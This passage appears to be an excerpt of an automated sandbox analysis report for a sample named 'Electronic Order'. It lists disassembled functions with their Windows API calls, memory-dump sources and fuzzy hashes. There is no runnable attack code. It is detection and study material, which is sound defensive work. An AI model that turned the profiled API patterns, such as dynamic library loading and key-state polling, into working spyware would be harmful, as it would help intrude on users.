                                      • Instruction Fuzzy Hash: 0A217434A00209AFDB10EF65D985EAEB7B8EF89704B004069F509EB251DB71EE45CB31
                                      Function 00E1A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00E1A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1A399
                                        • Part of subcall function 00E1A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1A3AC
                                        • Part of subcall function 00E1A37C: GetCurrentThreadId.KERNEL32 ref: 00E1A3B3
                                        • Part of subcall function 00E1A37C: AttachThreadInput.USER32(00000000), ref: 00E1A3BA
                                      • GetFocus.USER32 ref: 00E1A554
                                        • Part of subcall function 00E1A3C5: GetParent.USER32(?), ref: 00E1A3D3
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1A59D
                                      • EnumChildWindows.USER32(?,00E1A615), ref: 00E1A5C5
                                      • __swprintf.LIBCMT ref: 00E1A5DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      • Opcode ID: d520db8f64559757496cebc43761fc46bfacab1073bfac669acb2b2c61256266
                                      • Instruction ID: cecfcbd295389aa282f38da21e26851c16b517f278dd46e1c43a68c6402c3a8f
                                      • Opcode Fuzzy Hash: d520db8f64559757496cebc43761fc46bfacab1073bfac669acb2b2c61256266
                                      • Instruction Fuzzy Hash: 2C119071601209ABDF117FA1EC85FFE37A8DF49700F085079F919BA152CA7059858B75
                                      Function 00E22017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E22048
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      • Opcode ID: 344aad4716da988dbb646030f5f372bfb8b7a060c8a271aabaad9cab933e87d1
                                      • Instruction ID: ce430a0a744fa787140fec3bfe9980b9b67cab4b06e055989871227be1c09ac4
                                      • Opcode Fuzzy Hash: 344aad4716da988dbb646030f5f372bfb8b7a060c8a271aabaad9cab933e87d1
                                      • Instruction Fuzzy Hash: 14116D7090011ADFCF00EFA4E8819EEB7B4FF55304B5094A8D855B7252EB32690ACB60
                                      Function 00E3EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E3EF1B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E3EF4B
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E3F07E
                                      • CloseHandle.KERNEL32(?), ref: 00E3F0FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 3ae8a023925cf99c9bb51937aa0c53e838e1c295ce681c79efa4ea2098b4a9b3
                                      • Instruction ID: 5a529d1b74a8b5c027182736fc0376934121c86586d2834d467fcb0942e2ec83
                                      • Opcode Fuzzy Hash: 3ae8a023925cf99c9bb51937aa0c53e838e1c295ce681c79efa4ea2098b4a9b3
                                      • Instruction Fuzzy Hash: 078182B16007019FD720DF29C85AF6ABBE5EF48B10F14881DF599E7292DBB1AC01CB61
                                      Function 00E402C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40388
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E403C7
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E4040E
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00E4043A
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      • Opcode ID: 210e8b615a301de44de013a068ba278e7c2597b0a52fa76eb7718dad8113ff01
                                      • Instruction ID: 1e49c45e6e9f189d85c364a2aca53404dcabe5c18767b047be52a573cab6bf93
                                      • Opcode Fuzzy Hash: 210e8b615a301de44de013a068ba278e7c2597b0a52fa76eb7718dad8113ff01
                                      • Instruction Fuzzy Hash: A6515B31208205AFD704EF65D881F6EB7E8FF84704F04992DF695A7291DB31E905CB62
                                      Function 00E3DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E3DC3B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E3DCBE
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E3DCDA
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E3DD1B
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E3DD35
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E27B20,?,?,00000000), ref: 00DC5B8C
                                        • Part of subcall function 00DC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E27B20,?,?,00000000,?,?), ref: 00DC5BB0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: e22e502cd11747e90b503c1f65d5505a171ba39c97b22daa1358ec7cf24437c5
                                      • Instruction ID: fb79fa4285e7197eda279c7f70cd9e067d59a774fd4746e2884728d25b5a4cfd
                                      • Opcode Fuzzy Hash: e22e502cd11747e90b503c1f65d5505a171ba39c97b22daa1358ec7cf24437c5
                                      • Instruction Fuzzy Hash: 42511835A042069FCB01EFA8D898DADFBF4EF49314B059169E819AB312DB30AD45CF61
                                      Function 00E2E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E2E88A
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E2E8B3
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E2E8F2
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E2E917
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E2E91F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: e814dbc7266aeb536494852d1243d887839f5000779d868aff82765bd6b649af
                                      • Instruction ID: 22f44d6c8e06c399765d8f917ebf40ed463c93316bc88260c55a93fb3b140db9
                                      • Opcode Fuzzy Hash: e814dbc7266aeb536494852d1243d887839f5000779d868aff82765bd6b649af
                                      • Instruction Fuzzy Hash: 5E512839A00215DFCF05EF65D995EAEBBF5EF08314B148099E849AB361CB31AD51CB60
                                      Function 00E4A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfe89a8435feaddf7c1264ff63fd65351edc7891265e690d206868e1e4777a11
                                      • Instruction ID: 006f1f7bc946c5545053e7f06206b3bf8d6ae99f459f63bc76e3d0feec693b0a
                                      • Opcode Fuzzy Hash: cfe89a8435feaddf7c1264ff63fd65351edc7891265e690d206868e1e4777a11
                                      • Instruction Fuzzy Hash: A941F139940204AFC720DF28EC48FEDBBA5EB09324F195175F829B72E0E770AD41DA91
                                      Function 00DC2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00DC2357
                                      • ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                      • GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                      • GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 171cae56858c27cceeaf9f96d80e313f4d7d4e62653d91a95d392e179d9a71c1
                                      • Instruction ID: d7aae533d9187577f0c9fdca292dbc042a7f4d635d397a11145e5630d2f3d533
                                      • Opcode Fuzzy Hash: 171cae56858c27cceeaf9f96d80e313f4d7d4e62653d91a95d392e179d9a71c1
                                      • Instruction Fuzzy Hash: FD418C3550415AFBDB159F68C844EF9BBB4FB45320F20831AE928A3290C735A964DBA1
                                      Function 00E16920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E1695D
                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00E169A9
                                      • TranslateMessage.USER32(?), ref: 00E169D2
                                      • DispatchMessageW.USER32(?), ref: 00E169DC
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E169EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                      • String ID:
                                      • API String ID: 2108273632-0
                                      • Opcode ID: 9d8451414b1443d46dd6ab7fde4509c1d94e801eb74278ac30048f4a9f900c39
                                      • Instruction ID: 51308dba7acc718d0922617454e7ae8089a1120e42a18c0bed42ec6002f83d56
                                      • Opcode Fuzzy Hash: 9d8451414b1443d46dd6ab7fde4509c1d94e801eb74278ac30048f4a9f900c39
                                      • Instruction Fuzzy Hash: 5531A371900246AFDB20CFB5DC44FF67BA8AB42708F1491A9E429F61A1D73598C9D7A0
                                      Function 00E18F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00E18F12
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00E18FBC
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E18FC4
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00E18FD2
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E18FDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 8e37dce6603cd90fd3234df3ed014939ad7a4cd31c989586736120690f6bb7e7
                                      • Instruction ID: 8d48c32ca2564f5dd87e3ab262dfd4f1944e3bd7cc385fd2c14c4758cb376b03
                                      • Opcode Fuzzy Hash: 8e37dce6603cd90fd3234df3ed014939ad7a4cd31c989586736120690f6bb7e7
                                      • Instruction Fuzzy Hash: F931EE71A0021DEFDB14CF68DA4CADE7BB6FB09319F104229F925EA2D0C7B09955CB91
                                      Function 00E1B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00E1B6C7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E1B6E4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E1B71C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E1B742
                                      • _wcsstr.LIBCMT ref: 00E1B74C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: e2e02939359edfb6b3998bad5fe495b4446edafbb395754bddd072e03e74ebf3
                                      • Instruction ID: 91a5d7282dc5e94332225f8c40fa0057089df25a5e0c7822ffc0b2a2b148b087
                                      • Opcode Fuzzy Hash: e2e02939359edfb6b3998bad5fe495b4446edafbb395754bddd072e03e74ebf3
                                      • Instruction Fuzzy Hash: AC21F935604244BBEB255B3ADC49EBB7BACDF49B50F00417AFC05EA1A1EF61DC8196B0
                                      Function 00E4B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4B44C
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E4B471
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E4B489
                                      • GetSystemMetrics.USER32(00000004), ref: 00E4B4B2
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E31184,00000000), ref: 00E4B4D0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID:
                                      • API String ID: 2294984445-0
                                      • Opcode ID: 0872c3f19528f890223c8dfc0fb7fe98f80782c239c966504ea378dc977c89b2
                                      • Instruction ID: 215968f23ccc84fe5016313f126a79b71d7d3be807fbf8a1ed6a46d45b3ae035
                                      • Opcode Fuzzy Hash: 0872c3f19528f890223c8dfc0fb7fe98f80782c239c966504ea378dc977c89b2
                                      • Instruction Fuzzy Hash: 3A218D31A10265AFCB249F39AC04A6A3BA4EB05725F115728F93AE21E1E730D811DB90
                                      Function 00E197E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E19802
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E19834
                                      • __itow.LIBCMT ref: 00E1984C
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E19874
                                      • __itow.LIBCMT ref: 00E19885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 604dcedf1515af4d225906600332297af85e83d42f5579d02d7f1dd2253b6ae8
                                      • Instruction ID: 4ef24dbb410eee183989618031b83f224082348f9236fd90b7c3b6b6e55f09f4
                                      • Opcode Fuzzy Hash: 604dcedf1515af4d225906600332297af85e83d42f5579d02d7f1dd2253b6ae8
                                      • Instruction Fuzzy Hash: C1210A31B00204BFDB14AA659C8AEEE3BADEF4AB14F041068FD05FB242D6708D8597F1
                                      Function 00DC12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC134D
                                      • SelectObject.GDI32(?,00000000), ref: 00DC135C
                                      • BeginPath.GDI32(?), ref: 00DC1373
                                      • SelectObject.GDI32(?,00000000), ref: 00DC139C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 15f4bc55bff814470839c341b8c0eb7ea8007bc693585563cfa197ce447ecfb6
                                      • Instruction ID: bc2d1d183667cd8697606d5e24f9c1704b15200a7305a1a766a0c7561d57d971
                                      • Opcode Fuzzy Hash: 15f4bc55bff814470839c341b8c0eb7ea8007bc693585563cfa197ce447ecfb6
                                      • Instruction Fuzzy Hash: AD21B874800355DFDB149F56EC09B697BB8F702725F14821AF41CB71A1D3719859CFA0
                                      Function 00E1C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 521e28a60e758ed4c4e3c0e2a4a03f8fc681f6c5b77c3f25dba75775f2e24818
                                      • Instruction ID: e1e072b9a805a5c1fc3b78521c76401516e120b5017a40c652003e75e1c7a9c8
                                      • Opcode Fuzzy Hash: 521e28a60e758ed4c4e3c0e2a4a03f8fc681f6c5b77c3f25dba75775f2e24818
                                      • Instruction Fuzzy Hash: 2D01B9727C52057BD204B5255C42FEB73ACDB11398F645419FE04F7243E661DE9582F1
                                      Function 00E24D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00E24D5C
                                      • __beginthreadex.LIBCMT ref: 00E24D7A
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E24D8F
